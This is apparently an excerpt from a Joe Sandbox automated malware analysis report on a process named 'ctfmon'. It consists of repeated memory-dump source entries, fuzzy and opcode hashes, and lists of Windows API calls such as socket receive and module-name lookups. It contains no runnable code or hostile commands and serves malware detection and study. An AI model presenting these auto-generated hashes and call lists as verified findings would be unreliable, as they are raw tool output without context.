        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Task$AllocFreeH_prolog
        • String ID: $(
        • API String ID: 1522537378-55695022
        • Opcode ID: 7e69d556818cd5a1851330303f45f1f73408314ae1e8427cd738d52b82eff929
        • Instruction ID: e45d171d2f1bb2aaac46846c8d0f16db648deb0d3cfea91ab4a4292c5bbd6be5
        • Opcode Fuzzy Hash: 7e69d556818cd5a1851330303f45f1f73408314ae1e8427cd738d52b82eff929
        • Instruction Fuzzy Hash: 7AB10970A002059FDB14DFA9C884AAEFBF5FF88304B20496EE016EB291D775AD45CF54
        APIs
        • select.WS2_32(00000001,?,00000000,00000000,00000014), ref: 0040491E
        • recv.WS2_32(00000000,030E0000,000186A0,00000000), ref: 00404953
        • closesocket.WS2_32(00000000), ref: 00404A22
        • closesocket.WS2_32(00000000), ref: 00404A46
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: closesocket$recvselect
        • String ID: +*&=^^^^--------PTPM1
        • API String ID: 3519190455-393624235
        • Opcode ID: 27ed70f289c475a146f3c2e7ccf0ebaab3ee20ce23d8714a6e4ca9bd04cb5120
        • Instruction ID: a15c9d51dc272b9fe545b8961346552fe0b4d2b02f1de687d51cf6678d7e3f35
        • Opcode Fuzzy Hash: 27ed70f289c475a146f3c2e7ccf0ebaab3ee20ce23d8714a6e4ca9bd04cb5120
        • Instruction Fuzzy Hash: 6951B2762002009FC704CF24FC40B67BBF5F7A8314F548539E994A73A1D7B9A989EBA5
        APIs
        • GetVersionExA.KERNEL32 ref: 004102C2
        • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 004102F7
        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00410357
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: EnvironmentFileModuleNameVariableVersion
        • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
        • API String ID: 1385375860-4131005785
        • Opcode ID: bfe30102a0c4b2ab94a83b46ebd1f32b03c0ef1caef6cc2600ff381d8645089f
        • Instruction ID: 126d5043a1f7e65bc2068d23c44456634c671ba06e8d0b95b91ab4156e3e84ef
        • Opcode Fuzzy Hash: bfe30102a0c4b2ab94a83b46ebd1f32b03c0ef1caef6cc2600ff381d8645089f
        • Instruction Fuzzy Hash: 44314A7194534CAFEB3187705C95BDF37689B06308F5404DBD894D6242D6F88EC68B1D
        APIs
        • SendMessageW.USER32(00000000,00000433,00000000,?), ref: 004223A9
        • GetWindowLongW.USER32(?,000000FC), ref: 004223BA
        • GetWindowLongW.USER32(?,000000FC), ref: 004223CA
        • SetWindowLongW.USER32(?,000000FC,?), ref: 004223E6
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: LongWindow$MessageSend
        • String ID: (
        • API String ID: 2178440468-3887548279
        • Opcode ID: 3bf4c99cb503225f52b8dd62f2c612ffa84565c72bf3dd4d27c3f5495f9711c6
        • Instruction ID: 0887fd1d8c57f0dc07a948d484ba5af13b1aab812eb589b308dbb2651f147842
        • Opcode Fuzzy Hash: 3bf4c99cb503225f52b8dd62f2c612ffa84565c72bf3dd4d27c3f5495f9711c6
        • Instruction Fuzzy Hash: 8E31AE31700620AFDB21EF75E984B6FBBA4BF04314F90452EE94197691DBB9A805CB98
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: FreeString$ClearVariant
        • String ID: `DvP?Dv
        • API String ID: 3349467263-2995021381
        • Opcode ID: c6ed0a969ed6b6261a651c332f025beb1c08d77c40190fe13384ae6ea06520fe
        • Instruction ID: 3575c1e55b8ebace504c8559d5d8e129edef3a0f818806659e3e1524f78f469a
        • Opcode Fuzzy Hash: c6ed0a969ed6b6261a651c332f025beb1c08d77c40190fe13384ae6ea06520fe
        • Instruction Fuzzy Hash: 6E313971A00229FFCB14DFA5C884ADEBBB8FF48710F50842AF509A6281D774A944CFA4
        APIs
        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?), ref: 0042925A
          • Part of subcall function 00429348: lstrlenW.KERNEL32(?,0042928B,?,?), ref: 0042937C
        • lstrcpyW.KERNEL32(?,.HLP,?,?,00000104), ref: 004292FB
        • lstrcatW.KERNEL32(?,.INI,?,?,00000104), ref: 0042932A
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: FileModuleNamelstrcatlstrcpylstrlen
        • String ID: .HLP$.INI
        • API String ID: 2421895198-3011182340
        • Opcode ID: 32c3fdbe47f13a2511c981e50f3e73462810435089390b33b1753ebd04fc943f
        • Instruction ID: 5354100141cd0111f2c83c4e759e606604062e502d5c36874ba2bea8a0f2629b
        • Opcode Fuzzy Hash: 32c3fdbe47f13a2511c981e50f3e73462810435089390b33b1753ebd04fc943f
        • Instruction Fuzzy Hash: E53142B1900719EFDB20DFA5D885AC6B7F8AF08304F5049BBE54AD3151DB34AD848B68
        APIs
          • Part of subcall function 004271B3: GetParent.USER32(?), ref: 004271E6
          • Part of subcall function 004271B3: GetLastActivePopup.USER32(?), ref: 004271F5
          • Part of subcall function 004271B3: IsWindowEnabled.USER32(?), ref: 0042720A
          • Part of subcall function 004271B3: EnableWindow.USER32(?,00000000), ref: 0042721D
        • SendMessageW.USER32(?,00000376,00000000,00000000), ref: 00427071
        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,00000000), ref: 004270DF
        • MessageBoxW.USER32(00000000,?,?,00000000), ref: 004270ED
        • EnableWindow.USER32(00000000,00000001), ref: 00427109
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Window$EnableMessage$ActiveEnabledFileLastModuleNameParentPopupSend
        • String ID: PMB
        • API String ID: 1958756768-1324934742
        • Opcode ID: ce7fb727ab09d04d5f3f623b72e458f79ee0fa9dbac5fe75b105723b8ce71699
        • Instruction ID: 4949e603ba3b1f5991230ca5172b941e34d29e6685895596331aeb27549c8e70
        • Opcode Fuzzy Hash: ce7fb727ab09d04d5f3f623b72e458f79ee0fa9dbac5fe75b105723b8ce71699
        • Instruction Fuzzy Hash: 8521D672B04128AFDB209F94DCC5BAFB7B9EB44350F94042AE514E3350C7799D498BA4
        APIs
        • GetWindowLongW.USER32(?,000000F0), ref: 00420EF4
        • GetDlgItem.USER32(?,00000002), ref: 00420F13
        • IsWindowEnabled.USER32(00000000), ref: 00420F1E
        • SendMessageW.USER32(?,00000111,00000002,00000000), ref: 00420F34
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Window$EnabledItemLongMessageSend
        • String ID: Edit
        • API String ID: 3499652902-554135844
        • Opcode ID: c0a5469a5a856ea4fc2de64ab117f76beaec6be51fad4795c6557c1e6c80bc8f
        • Instruction ID: 60899dcfc3587a15ced3cc413fca3ebc9283b805f23eb41fcd32d928ea0cbd6c
        • Opcode Fuzzy Hash: c0a5469a5a856ea4fc2de64ab117f76beaec6be51fad4795c6557c1e6c80bc8f
        • Instruction Fuzzy Hash: 40010830380231AAEA306B26BD09B7BB7E59F10760FD24427F401E22E2CBE8D856C11C
        APIs
        • GetWindowExtEx.GDI32(?,00407774,00000000,?,?,?,00407774,?,?,?,?,?,?,00000000,00000000), ref: 0042658E
        • GetViewportExtEx.GDI32(?,?,?,00407774,?,?,?,?,?,?,00000000,00000000), ref: 0042659B
        • MulDiv.KERNEL32(00407774,00000000,00000000), ref: 004265C0
        • MulDiv.KERNEL32(46892C46,00000000,00000000), ref: 004265DB
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: ViewportWindow
        • String ID: tw@
        • API String ID: 1589084482-3122378559
        • Opcode ID: 5bbac0ae4d7fb4264335a9c4321448357a773c21af9a9bff716acac9ab490366
        • Instruction ID: ce0e09d475a622cb5eb5a1da7693da6cd9b819a777b60fa32cf6f8d38c90c4e5
        • Opcode Fuzzy Hash: 5bbac0ae4d7fb4264335a9c4321448357a773c21af9a9bff716acac9ab490366
        • Instruction Fuzzy Hash: 7AF01D72400108FFEB156BA2EC05CBEBBBDEF90314754487AF851A3170DB726D619B94
        APIs
        • GetStartupInfoA.KERNEL32(?), ref: 0041004A
        • GetFileType.KERNEL32(?,?,00000000), ref: 004100F5
        • GetStdHandle.KERNEL32(-000000F6,?,00000000), ref: 00410158
        • GetFileType.KERNEL32(00000000,?,00000000), ref: 00410166
        • SetHandleCount.KERNEL32 ref: 0041019D
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: FileHandleType$CountInfoStartup
        • String ID:
        • API String ID: 1710529072-0
        • Opcode ID: c4614b89e3f0e78a588a77f40bdc57e04f10cb5bb0fe7c99d5bd66e85f2c9a8e
        • Instruction ID: 9efafb25e1c49cefaa9801ddeb0c15ad3ba9d2cf75d41a5d73fe4d8c6704c713
        • Opcode Fuzzy Hash: c4614b89e3f0e78a588a77f40bdc57e04f10cb5bb0fe7c99d5bd66e85f2c9a8e
        • Instruction Fuzzy Hash: 855138315042059BC7208B68DC847EA7BE0FB16338F24466EC592DB2E1D7BED8DAC759
        APIs
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Color$H_prologLocaleMessageSendTextThread
        • String ID:
        • API String ID: 741590120-0
        • Opcode ID: f7053f1ad1be2417574c4c939892cdd83a9888b3ce4a9b4dd911e18ce2a993c2
        • Instruction ID: f9e5b8384eab3ba489f7196092203c7d724fd180af1cedfd33864e84ada0d436
        • Opcode Fuzzy Hash: f7053f1ad1be2417574c4c939892cdd83a9888b3ce4a9b4dd911e18ce2a993c2
        • Instruction Fuzzy Hash: 1051AF70914716DFDB20DF65C9404AAB7F0FF14314B22852EE897AB3A0E738E961CB59
        APIs
        • SysAllocString.OLEAUT32(?), ref: 0042A739
          • Part of subcall function 00424B39: LoadStringW.USER32(?,?,?,?), ref: 00424B50
        • SysAllocString.OLEAUT32(?), ref: 0042A748
        • SysAllocString.OLEAUT32(?), ref: 0042A78E
        • SysAllocString.OLEAUT32(?), ref: 0042A7A2
        • SysAllocString.OLEAUT32(?), ref: 0042A7BF
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: String$Alloc$Load
        • String ID:
        • API String ID: 3862620831-0
        • Opcode ID: f6ca087355628dbc399f6843932c52c76a3f68a4c4011377d4e366b53c13f2f5
        • Instruction ID: 6803650498ba4989a99e64115ce7b714a56dc8d8622e699d9d0cda383d46dfbc
        • Opcode Fuzzy Hash: f6ca087355628dbc399f6843932c52c76a3f68a4c4011377d4e366b53c13f2f5
        • Instruction Fuzzy Hash: F8317C30600710AFC720EF26E885B5AB7F5BF84700F50892BE85997691D778E891CB9A
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 0267abc6433f213ff09637eccae298c1139d1c86d54d5fa1176bbc9bac3441c6
        • Instruction ID: 5f9584f858f3fd3441d1eeae4cb6474de1c9940f427edf65aea8a548a520b4bc
        • Opcode Fuzzy Hash: 0267abc6433f213ff09637eccae298c1139d1c86d54d5fa1176bbc9bac3441c6
        • Instruction Fuzzy Hash: 8D31B475650210AFD330DF19EC856E637A0FBA1358F20653AD60AC72E1D734988ECB94
        APIs
        • GetMapMode.GDI32(?,?,?,?,?,?,00407740,?,00000000,?,?,?,?,?,?,?), ref: 004278D7
        • GetDeviceCaps.GDI32(?,00000058), ref: 00427911
        • GetDeviceCaps.GDI32(?,0000005A), ref: 0042791A
          • Part of subcall function 004265E6: GetWindowExtEx.GDI32(?,?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000,00000000), ref: 004265F7
          • Part of subcall function 004265E6: GetViewportExtEx.GDI32(?,?,?,?,?,?,?,00000000,00000000), ref: 00426604
          • Part of subcall function 004265E6: MulDiv.KERNEL32(?,00000000,00000000), ref: 00426629
          • Part of subcall function 004265E6: MulDiv.KERNEL32(00000002,00000000,00000000), ref: 00426644
        • MulDiv.KERNEL32(?,000009EC,00000060), ref: 0042793E
        • MulDiv.KERNEL32(00000002,000009EC,?), ref: 00427949
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: CapsDevice$ModeViewportWindow
        • String ID:
        • API String ID: 2598972148-0
        • Opcode ID: 82fb9aefea54476f9e4efb772e43ca4f4989d83242b50b67186938c72895dec2
        • Instruction ID: 6e5dd03be2f2a077cc23b63b074e70d19be67c8710d15462bb73e943247fa81e
        • Opcode Fuzzy Hash: 82fb9aefea54476f9e4efb772e43ca4f4989d83242b50b67186938c72895dec2
        • Instruction Fuzzy Hash: C211CE71700624EFEB21AF55EC44C2FBBE9EF88750B51402AE98597321D771AC829F54
        APIs
        • __EH_prolog.LIBCMT ref: 00422724
        • GetClassInfoW.USER32(?,?,?), ref: 0042273F
        • RegisterClassW.USER32(00000004), ref: 0042274A
        • lstrcatW.KERNEL32(00000034,?,00000001), ref: 00422781
        • lstrcatW.KERNEL32(00000034,00000004), ref: 00422792
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Classlstrcat$H_prologInfoRegister
        • String ID:
        • API String ID: 106226465-0
        • Opcode ID: 5646f68694f66a7569b41e42e3248d6500a3e60ab4d64e53f9044bdf58ec9da1
        • Instruction ID: 6b4f5334b2da6ce01ac7bdb77f7903c950944f1e7d17838be749cb4d6a50b4f5
        • Opcode Fuzzy Hash: 5646f68694f66a7569b41e42e3248d6500a3e60ab4d64e53f9044bdf58ec9da1
        • Instruction Fuzzy Hash: 4111E535701324BEDB10AFA1ED81A9E7BB8EF44754F40452EFC05A7151CBB496018B99
        APIs
        • GetLastError.KERNEL32(00000103,7FFFFFFF,0040F933,004152C9,00000000,?,?,00000000,00000001), ref: 00410211
        • TlsGetValue.KERNEL32(?,?,00000000,00000001), ref: 0041021F
        • SetLastError.KERNEL32(00000000,?,?,00000000,00000001), ref: 0041026B
          • Part of subcall function 00413F58: HeapAlloc.KERNEL32(00000008,?,00000000,00000000,00000001,00410234,00000001,00000074,?,?,00000000,00000001), ref: 0041404E
        • TlsSetValue.KERNEL32(00000000,?,?,00000000,00000001), ref: 00410243
        • GetCurrentThreadId.KERNEL32 ref: 00410254
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: ErrorLastValue$AllocCurrentHeapThread
        • String ID:
        • API String ID: 2020098873-0
        • Opcode ID: 4d9088bc305a3a135a6a46da3cc8cf04b83fd6bff02b56f14dc8209a2a451f00
        • Instruction ID: e67e7c9409d6482dbb0cac13eed9dcc457f33c4e76e944be94ce0609059d711d
        • Opcode Fuzzy Hash: 4d9088bc305a3a135a6a46da3cc8cf04b83fd6bff02b56f14dc8209a2a451f00
        • Instruction Fuzzy Hash: 80F02B32B055129BC7302F71AC4E5AE3A60EF02771B50017AF842A52F0CFB88CC28A6D
        APIs
        • TlsFree.KERNEL32(00000000,?,?,00428D54,00000000,00000001), ref: 00428853
        • GlobalHandle.KERNEL32(0056B508), ref: 0042887B
        • GlobalUnlock.KERNEL32(00000000), ref: 00428884
        • GlobalFree.KERNEL32(00000000), ref: 0042888B
        • DeleteCriticalSection.KERNEL32(0053F0FC,?,?,00428D54,00000000,00000001), ref: 00428895
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Global$Free$CriticalDeleteHandleSectionUnlock
        • String ID:
        • API String ID: 2159622880-0
        • Opcode ID: 72abfe4615f1a0306001f0a3fcdde9ea638aa21f76941549bfc717915cfb7916
        • Instruction ID: 3d5d1d7ecfedab2d5cc22e9364798e3d77b8a9c8052dba26925915cdb0ff854d
        • Opcode Fuzzy Hash: 72abfe4615f1a0306001f0a3fcdde9ea638aa21f76941549bfc717915cfb7916
        • Instruction Fuzzy Hash: AFF09A357006209BC630AB69AC88A2F76A8AF847507C9056EF801D3261CF28DC028AA8
        APIs
        Strings
